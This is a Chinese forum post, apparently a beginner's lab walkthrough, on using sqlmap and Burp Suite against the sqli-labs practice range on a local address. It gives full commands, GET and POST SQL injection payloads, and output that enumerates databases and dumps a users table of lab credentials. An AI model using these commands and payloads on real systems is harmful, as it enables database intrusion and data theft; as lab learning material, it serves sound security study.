sqlmap工具的简单使用，自动注入爆库、爆表、爆字段，爆数据

小菜鸟一枚 · 2022-3-11 11:31:30

1.上次学习时安装了kali，这次来看看kali自带的工具，sqlmap，准备好sqllibs靶场。

打开终端输入：sqlmap -u http://192.168.2.113/web/Less-1/?id=1 --dbs --batch ，get类型的参数ID，可以看到顺利爆出数据库，并且存在四种注入类型的漏洞。

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9591=9591 AND 'PXGC'='PXGC
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4450 FROM(SELECT COUNT(*),CONCAT(0x717a716a71,(SELECT (ELT(4450=4450,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vzrh'='vzrh
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6200 FROM (SELECT(SLEEP(5)))IUNL) AND 'ckXH'='ckXH
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-9838' UNION ALL SELECT NULL,NULL,CONCAT(0x717a716a71,0x456c494947434477796e6c4d544974566f41536355636857574477796c7777695550627046704d6d,0x71706a7671)-- -
---
[22:12:16] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[22:12:16] [INFO] fetching database names
[22:12:17] [INFO] resumed: 'information_schema'
[22:12:17] [INFO] resumed: 'challenges'
[22:12:17] [INFO] resumed: 'mysql'
[22:12:17] [INFO] resumed: 'performance_schema'
[22:12:17] [INFO] resumed: 'security'
[22:12:17] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

复制代码

2.第二种post注入，也就是表单，参数以post方式提交：

这种情况下，地址栏不能看到提交的参数名称，怎么注入呢？学过前端的都知道F12控制台，那如果是有请求头验证呢，带别的呢？

3.这个时候用到kali自带的另一款工具burpsuite了，抓个包看看，这下子整个请求的参数就能看到了，把下面的内容保存成bom文件。

POST /web/Less-12/ HTTP/1.1
Host: 192.168.2.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: http://192.168.2.113
Connection: close
Referer: http://192.168.2.113/web/Less-12/
Upgrade-Insecure-Requests: 1
uname=admin&passwd=123456&submit=Submit

复制代码

同样打开终端输入：sqlmap -r bom --dbs --batch，也爆出了数据库。

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uname=1") AND (SELECT 1552 FROM(SELECT COUNT(*),CONCAT(0x716a787171,(SELECT (ELT(1552=1552,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("fmsM"="fmsM&passwd=2&submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=1") AND (SELECT 5849 FROM (SELECT(SLEEP(5)))LZXJ) AND ("FWuX"="FWuX&passwd=2&submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=1") UNION ALL SELECT CONCAT(0x716a787171,0x596e546d6c547979586570797072656c6563514b5a514257536a68745145736144537877456c4444,0x7162716b71),NULL#&passwd=2&submit=Submit
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: uname=1") OR NOT 7732=7732#&passwd=2&submit=Submit
---
[22:20:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[22:20:36] [INFO] fetching database names
[22:20:37] [INFO] resumed: 'information_schema'
[22:20:37] [INFO] resumed: 'challenges'
[22:20:37] [INFO] resumed: 'mysql'
[22:20:37] [INFO] resumed: 'performance_schema'
[22:20:37] [INFO] resumed: 'security'
[22:20:37] [INFO] resumed: 'test'
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

复制代码

其他的命令：
sqlmap -r bom -D security --tables --batch 爆security数据库对应的所有表

database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |

复制代码

sqlmap -r bom -T users --columns --batch 爆user表的所有字段（列）

Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |

复制代码

sqlmap -r bom -T users ----dump --batch 爆user表的所有数据（行）

Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dumbo | dhakkan |
| 14 | admin4 | admin4 |
+----+------------+----------+

复制代码

小远 · 2022-3-11 12:21:13

TinYa · 2022-3-11 19:12:18

牛

五云包子 · 2022-4-10 09:58:48

终于找到详细sqlmap注入的学习资源了，谢作者

已空 · 2022-8-19 09:07:33

厉害

sqlmap工具的简单使用，自动注入爆库、爆表、爆字段，爆数据

本帖子中包含更多资源

社区居民

忠实会员

新人须知

常见问题

关于我们